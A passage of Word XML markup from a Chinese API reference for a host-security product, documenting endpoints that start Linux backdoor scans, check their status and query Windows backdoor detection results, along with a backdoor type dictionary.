          <w:p w14:paraId="6DE621EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B09096" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A79E57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C313D5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BD481" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E429DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426C453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46711A"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497C54" w14:paraId="79F3378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F6DE130" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6564DA42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6915FE80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD15D41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AB135C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A69A6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7F13A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4221AF28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214978EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B68DBAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C04129" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>1、如果功能开关未打开，则会抛出异常及相关提示</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、如果上次扫描任务未执行完毕，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90760C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="linux后门检测-查询扫描"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r>
        <w:t>Linux后门检测-查询扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D6E05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux后门检测当前正在执行的扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542907C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD9048" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/backdoor/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84EC93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74BC1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15616FEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F3381" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/backdoor/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037D15A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18673C58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "retcode": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82BCDB"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0F2CE1C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19402EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564181CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A1DCD20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5452FFD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="745DB2B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47DF2607" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C2A8FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D9F8EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392FA870" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66E6C4FD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="499D209E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF93207" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12010E36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8AF506" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2:running 3:success 4: failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E2007A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="windows后门检测"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows后门检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1B701" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="查询结果-6"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21668372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Windows后门检测扫描结果的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD7D69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A510C8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/backdoor/win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B23CF"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863"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3152"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4B808AD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D79AAF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9FCB3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50442438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612E625E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C0C6059" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5A1F29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="256A3A51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="774C07C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD3024F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6090637C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D91365" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FC9D418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDA84B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3622652E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B84B29A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E457AB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A81A32F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A5E20B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5819A967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7136A86B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC4A425" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EDA1659" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F985EA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6373EC21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>后门类型，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="windows后门类型">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>Windows后门类型</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67BF64C6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E8096E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BEA4D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C6AAD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7493DE2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>问题摘要</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3489E6A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>Windows后门类型字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="676"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7FA5475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96295FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46211EBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F8656ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AE0F00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A82305D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17B0D785" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC1853B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E211F0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1180B1D2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7648B9B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F09AEB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="113D69FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11328B20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B100930" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CDBBA88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
